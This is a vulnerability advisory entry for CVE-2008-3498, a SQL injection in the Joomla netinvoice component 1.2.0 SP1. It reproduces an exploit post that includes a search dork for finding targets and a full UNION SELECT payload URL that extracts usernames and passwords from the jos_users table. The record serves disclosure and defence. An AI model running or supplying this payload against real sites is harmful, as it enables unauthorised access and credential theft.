Topic : | Joomla Component netinvoice 1.2.0 SP1 SQL Injection Vulnerability
|
SecurityAlert : 4114
CVE : CVE-2008-3498
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : His0k4
Published : 08.08.2008
Affected Software : | Joomla, Com_netinvoice, 1.2.0, Service Pack 1 |
 Advisory Content : /---------------------------------------------------------------\
\ /
/ Joomla Component netinvoice Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_netinvoice
[*] POC :
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=order
s&task=order&cid={SQL}
[*] Example :
http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=order
s&task=order&cid=-1 UNION SELECT
1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,1
9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4
4,45,46,47,48 FROM jos_users--
---------------------------------------------------------------------------
-
[*] Greetings : All friends & muslims HaCkeRs...
[*] Greetings2: http://palcastle.org/cc
References :
http://securityreason.com/expldownload/1/4194/1 (Exploit)
http://www.nbill.co.uk/forum-smf/index.php/topic,716.0.html
http://www.milw0rm.com/exploits/5939
http://secunia.com/advisories/30752
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|